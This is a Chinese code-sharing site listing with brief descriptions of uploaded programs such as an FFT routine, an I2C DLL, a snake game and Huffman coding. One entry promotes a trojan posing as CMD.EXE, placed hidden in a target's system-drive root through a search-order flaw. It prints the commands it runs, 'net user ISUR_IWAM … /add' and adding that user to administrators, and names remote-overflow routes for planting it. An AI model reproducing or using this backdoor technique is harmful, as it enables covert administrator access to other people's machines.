快速傅里叶变换,把该文件包含后即可使用其函数。
标签: 快速傅里叶变换
上传时间: 2013-12-20
上传用户:330402686
keil c51下基于软件模拟I2C总线的Dll动态连接库。下载后将其烤到keil\C51\bin下即可。
上传时间: 2014-11-12
上传用户:ardager
我忘了自己何年何月在凌晨的时候还涩着眼睛看完落落讲的一个仓鼠和芝兰的故事。何年何月啊,想不起来了,头有点痛。记忆像腐烂的叶子,那些清新那些嫩绿早已埋葬在时间刻度的前段,惟有铺天盖地的腐烂气味留在时间刻度的尾部。突然一阵风,往上飘,往上飘,然后在某一个
标签:
上传时间: 2014-12-07
上传用户:李梦晗
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
对文件进行处理。 包括文件复制、分割、连接、查看等。
上传时间: 2015-01-12
上传用户:牛布牛
自己写的哈夫曼编码与译码 这个是基于对话框的
上传时间: 2015-01-12
上传用户:赵云兴
一个自己编写的贪食蛇游戏.
标签: 编写
上传时间: 2013-12-19
上传用户:黑漆漆
我自己写的一个很有意思的C#猜谜软件,界面美观大方,使用许多新颖的.icon图标
标签: 软件
上传时间: 2015-01-13
上传用户:曹云鹏
DLL动态连接库编程的资料,学习用啊
上传时间: 2013-12-12
上传用户:wangyi39
老外写的超连接类,功能比较全,类似于HTML的链接,还能自定义提示信息
标签: 连接
上传时间: 2014-01-16
上传用户:dongbaobao